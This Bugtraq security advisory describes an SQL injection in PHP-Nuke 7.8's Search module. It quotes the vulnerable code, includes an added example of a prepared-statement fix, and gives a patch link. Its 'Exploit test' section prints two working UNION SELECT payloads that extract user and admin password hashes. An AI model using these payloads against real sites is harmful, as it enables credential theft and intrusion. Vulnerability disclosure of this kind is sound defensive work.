
List:       bugtraq
Subject:    Critical SQL Injection PHPNuke <= 7.8
From:       sp3x () securityreason ! com
Date:       2005-11-15 14:23:17
Message-ID: 20051115142317.7593.qmail () securityfocus ! com

SecurityAlert SA027

Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005

Affected software :
===================

PHPNuke version : 7.8 with all security fixes/patches

Not Affected software :
=======================

PHPNuke version : 7.9 + patch 3.1

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with a user system. Each user can submit comments to discuss the articles, similar to Slashdot and many others. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referers page to know who links to us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires the Apache Web server, PHP and a SQL database (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support for 25 languages, Yahoo like search engine, Comments option in Polls, lots of themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, advanced blocks systems, reviews system, newsletter, categorized articles, multilanguage content management, phpBB Forums included and a lot more.


Vulnerabilities :
*****************

Critical SQL injection   :
==========================

In the module called "Search" there is a SQL injection bug, which can lead to the theft of the admin's username and MD5 password hash, as well as other sensitive data from the database.


The problem is in index.php, so first let's look at the source code of this file.

Original code from index.php :
---------------------------------
...
// $query comes from the search form; stripslashes() removes the backslash
// escaping on it before the value is spliced into the SQL string below.
$query = stripslashes(check_html($query, "nohtml"));
if ($type=="stories" OR !$type) {

    if ($category > 0) {
        $categ = "AND catid='$category' ";
    } else {
        $categ = "";
    }
    $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where s.aid=a.aid $queryalang $categ";
    // $query is interpolated unescaped into four LIKE clauses
    if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%') ";
    if (!empty($author)) $q .= "AND s.aid='$author' ";
    if (!empty($topic)) $q .= "AND s.topic='$topic' ";
    if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
    $q .= " ORDER BY s.time DESC LIMIT $min,$offset";
    $t = $topic;
    $result5 = $db->sql_query($q);
    $nrows = $db->sql_numrows($result5);
....
-----------------------------------

Here we can see that stripslashes() is applied to the $query variable.
Calling stripslashes() before the MySQL statement is built removes the backslash escaping that was put on the submitted term (for example by magic_quotes_gpc), so any quote in the term is spliced into the query unescaped; this leads to a critical SQL injection.
This SQL injection works in every type of search, that is:
type=="stories"
type=="comments"
type=="reviews"
type=="users"

It will also work when is_active("Downloads"), is_active("Web_Links") or is_active("Encyclopedia") is true.

So we have here about 7 critical SQL injections.
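As an added example, not PHP-Nuke's own code, here is the story-search LIKE clause from index.php rebuilt two ways: the original pattern, where stripslashes() strips the escaping magic_quotes_gpc added so the quote reaches the statement live, and a hardened version that binds the term through a mysqli prepared statement. The reduced column list, the $db handle and the sample search term are assumptions.

```php
<?php
// Added example (not PHP-Nuke's own code): the story search from index.php,
// reduced to the LIKE clause, built the vulnerable way and the hardened way.
// $prefix is the configured table prefix ("nuke" in the advisory), not user input.

// Vulnerable pattern from index.php: stripslashes() removes the backslash
// escaping that magic_quotes_gpc put on the submitted term, so a quote in the
// term is spliced into the statement live and ends the string literal early.
function vulnerable_search_sql(string $prefix, string $query): string
{
    $query = stripslashes($query);
    return "SELECT s.sid, s.title FROM {$prefix}_stories s "
         . "WHERE (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%')";
}

// Hardened form: the term is never concatenated into SQL. It is bound as a
// parameter of a prepared statement, and the LIKE wildcards are escaped and
// added in PHP, so quotes, parentheses and '%' in the term are only data.
// (Assumes a connected mysqli handle; get_result() needs the mysqlnd driver.)
function safe_search(mysqli $db, string $prefix, string $query): array
{
    $sql = "SELECT s.sid, s.title FROM {$prefix}_stories s "
         . "WHERE (s.title LIKE ? OR s.hometext LIKE ?)";
    $stmt = $db->prepare($sql);
    $pattern = '%' . addcslashes($query, '%_\\') . '%';  // escape LIKE metacharacters
    $stmt->bind_param('ss', $pattern, $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Constructed sample: the user typed O'Reilly; magic_quotes_gpc delivered O\'Reilly.
$submitted = "O\\'Reilly";
echo vulnerable_search_sql('nuke', $submitted), "\n";
// The printed statement contains LIKE '%O'Reilly%': the quote is back and
// terminates the literal, which is the defect the advisory describes.
```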

Exploit test :
--------------

Enter this into the Search field :

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
-> users' passwords and logins

s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*
-> nuke_authors passwords and logins

Exploit :
---------

http://securityreason.com/achievement_exploitalert/5

How to fix :
============

Download the new version of the script or update.
http://securityreason.com/patch/6

Greets :
========

Special greets : cXIb8O3 , pkw, pi3, p_e_a  and others .


Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

